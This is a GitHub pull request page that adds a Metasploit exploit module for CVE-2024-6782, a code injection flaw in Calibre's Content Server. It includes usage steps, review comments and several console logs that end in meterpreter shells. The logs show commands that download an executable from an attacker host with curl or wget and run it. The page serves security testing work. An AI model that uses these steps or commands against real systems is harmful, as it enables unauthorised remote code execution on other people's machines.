Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Calibre Python Code Injection (CVE-2024-6782) #19357

Merged
merged 3 commits into from
Aug 7, 2024
Merged

Calibre Python Code Injection (CVE-2024-6782) #19357

merged 3 commits into from
Aug 7, 2024

Conversation

h4x-x0r
Copy link
Contributor

@h4x-x0r h4x-x0r commented Aug 2, 2024
edited by bwatters-r7
Loading

This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.14.0 (CVE-2024-6782). Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.

Verification Steps

  1. Install Calibre from here.
  2. Start Calibre and click Connect/share > Start Content server
  3. Run Metasploit:
  • Start msfconsole and enter the following commands
  • use exploit/multi/misc/calibre_exec
  • set RHOSTS <IP>
  • set LHOST <IP>
  • exploit

You should get a meterpreter session running in the same context as the Calibre application.

msf6 exploit(multi/misc/calibre_exec) > exploit 

[*] Started reverse TCP handler on 192.168.137.190:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending payload...
[*] Sending stage (201798 bytes) to 192.168.137.194
[*] Meterpreter session 1 opened (192.168.137.190:4444 -> 192.168.137.194:50346) at 2024-08-01 23:28:16 -0400
[*] Exploit finished, check thy shell.

meterpreter > sysinfo
Computer        : DESKTOP-foo
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

meterpreter > shell
Process 6084 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19045.4529]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Calibre2>whoami
whoami
desktop-foo\admin

Successfully tested on

Windows:

  • Calibre v7.14 on Windows 10 22H2
  • Calibre v7.0 on Windows 10 22H2
  • Calibre v6.29 on Windows 10 22H2
  • Calibre v6.9 on Windows 10 22H2

Linux:

  • Calibre v7.14 on Ubuntu 24.04 LTS
  • Calibre v7.0 on Ubuntu 24.04 LTS
  • Calibre v6.29 on Ubuntu 24.04 LTS
  • Calibre v6.9 on Ubuntu 24.04 LTS

@h4x-x0r
Calibre Python Code Injection (CVE-2024-6782)
6dbb264 
New Exploit Module for Calibre Python Code Injection (CVE-2024-6782)
@dledda-r7 dledda-r7 self-assigned this Aug 2, 2024
@h4x-x0r
v7.15 Support added
2ce0a7a 
Updated to work with v7.15 too.
@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Aug 2, 2024

Added support for v7.15. The original advisory only states that versions 6.9.0 ~ 7.14.0 are affected, but from the official changelog, we can see that a fix was only added with v7.16.

dledda-r7
dledda-r7 reviewed Aug 2, 2024
View reviewed changes
Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Hello @h4x-x0r, Thanks for your PR!
I've left some comments for you to evaluate.

Testing

Calibre 7.14.0 - Windows Server 2019 
msf6 exploit(multi/misc/calibre_exec) > exploit

[*] Started reverse TCP handler on 192.168.136.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending payload...
[*] Sending stage (228422 bytes) to 192.168.136.130
[*] Meterpreter session 1 opened (192.168.136.128:4444 -> 192.168.136.130:49723) at 2024-08-02 10:05:10 -0400

[*] Exploit finished, check thy shell.

meterpreter > 
meterpreter > sysinfo
Computer        : WIN-JR5HP085VV3
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

modules/exploits/multi/misc/calibre_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/misc/calibre_exec.rb Outdated
Comment on lines 131 to 133
if res && res.code == 200
print_good('Command successfully executed, check your shell.')
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I was thinking here to have an else branch to notify the user something went wrong.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

While testing different payloads - such as a simple calc execution, I did receive a 200 response. With payloads that take a little longer, such as the meterpreter ones, no response is received by the time the payload has executed and a shell has already been established, so I wasn't sure if a else branch is required.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I've added a check in case a 400 response is returned - based on my tests, this seems to be the most common scenario other than a 200 response.

@dledda-r7 dledda-r7 removed their assignment Aug 2, 2024
jvoisin
jvoisin reviewed Aug 2, 2024
View reviewed changes
modules/exploits/multi/misc/calibre_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/misc/calibre_exec.rb Outdated Show resolved Hide resolved
modules/exploits/multi/misc/calibre_exec.rb Outdated Show resolved Hide resolved
@bwatters-r7 bwatters-r7 self-assigned this Aug 2, 2024
@h4x-x0r
Code cleanup
1390251 
Updated code for version detection and exploit invocation
@Admin9961
Copy link

Admin9961 commented Aug 3, 2024
edited
Loading

Suggestion feature: add self-detection method for OS discovery

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Aug 3, 2024

Suggestion feature: add self-detection method for OS discovery

Diffing the HTTP responses of a Calibre Content Server running on Windows and Linux, I didn't notice a specific string or similar that would indicate the OS that is being used. Is there a specific API or endpoint that can be queried to retrieve this information?

Otherwise I'd just suggest to do the typical enumeration with nmap etc., and then set the target manually with set target.

@bwatters-r7
Copy link
Contributor 

msf6 exploit(multi/misc/calibre_exec) > show options

Module options (exploit/multi/misc/calibre_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.5.132.118     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    8080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ouIWFbZKZ        no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows_Fetch



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/calibre_exec) > run

[*] Command to run on remote host: curl -so %TEMP%\GpywZYeWIU.exe http://10.5.135.201:8080/h8r3u5VU3v-qeqUW3_anLw & start /B %TEMP%\GpywZYeWIU.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /h8r3u5VU3v-qeqUW3_anLw
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 7.14.0
[+] The target appears to be vulnerable.
[*] Sending payload...
[*] Client 10.5.132.118 requested /h8r3u5VU3v-qeqUW3_anLw
[*] Sending payload to 10.5.132.118 (curl/7.83.1)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.118:58790) at 2024-08-06 19:36:18 -0500
[*] Exploit finished, check thy shell.

meterpreter > sysinfo
Computer        : DESKTOP-V413087
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-V413087\msfconsole

@bwatters-r7 bwatters-r7 closed this Aug 7, 2024
@bwatters-r7 bwatters-r7 reopened this Aug 7, 2024
@bwatters-r7
Copy link
Contributor

Sorry about that; hit the wrong button!

@bwatters-r7
Copy link
Contributor 

msf6 exploit(multi/misc/calibre_exec) > show options

Module options (exploit/multi/misc/calibre_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.5.132.118     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    8080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                           no        Comma-separate list of extensions to load
   EXTINIT                              no        Initialization strings for extensions
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      ouIWFbZKZ        no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows_Fetch



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/calibre_exec) > run

[*] Command to run on remote host: curl -so %TEMP%\GpywZYeWIU.exe http://10.5.135.201:8080/h8r3u5VU3v-qeqUW3_anLw & start /B %TEMP%\GpywZYeWIU.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /h8r3u5VU3v-qeqUW3_anLw
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 7.14.0
[+] The target appears to be vulnerable.
[*] Sending payload...
[*] Client 10.5.132.118 requested /h8r3u5VU3v-qeqUW3_anLw
[*] Sending payload to 10.5.132.118 (curl/7.83.1)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.118:58790) at 2024-08-06 19:36:18 -0500
[*] Exploit finished, check thy shell.

meterpreter > sysinfo
Computer        : DESKTOP-V413087
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-V413087\msfconsole

@bwatters-r7
Copy link
Contributor 

msf6 exploit(multi/misc/calibre_exec) > show options

Module options (exploit/multi/misc/calibre_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metas
                                       ploit.html
   RPORT    8080             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                     no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      zsmvwWCNdA       no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(multi/misc/calibre_exec) > run

[*] Command to run on remote host: wget -qO ./CKbMsLDGUR http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x ./CKbMsLDGUR; ./CKbMsLDGUR &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 7.14.0
[+] The target appears to be vulnerable.
[*] Sending payload...
[*] Client 10.5.134.129 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.129:39534) at 2024-08-07 16:31:47 -0500
[*] Exploit finished, check thy shell.

meterpreter > sysinfo
Computer     : 10.5.134.129
OS           : Ubuntu 22.04 (Linux 5.15.0-43-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter >

@bwatters-r7 bwatters-r7 merged commit baca872 into rapid7:master Aug 7, 2024
75 checks passed
@bwatters-r7
Copy link
Contributor

Release Notes

Adds a module targeting CVE-2024-6782, an unauthenticated Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.14.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic. The injected payload will get executed in the same context under which Calibre is being executed.

@cgranleese-r7 cgranleese-r7 added module rn-modules release notes for new or majorly enhanced modules labels Aug 9, 2024
@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Aug 19, 2024

Great, thank you!

Not sure if there's any relevance to the labels, but perhaps the docs label could be added too?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@dledda-r7 dledda-r7 dledda-r7 left review comments

@jvoisin jvoisin jvoisin left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
6 participants
@h4x-x0r @Admin9961 @bwatters-r7 @jvoisin @dledda-r7 @cgranleese-r7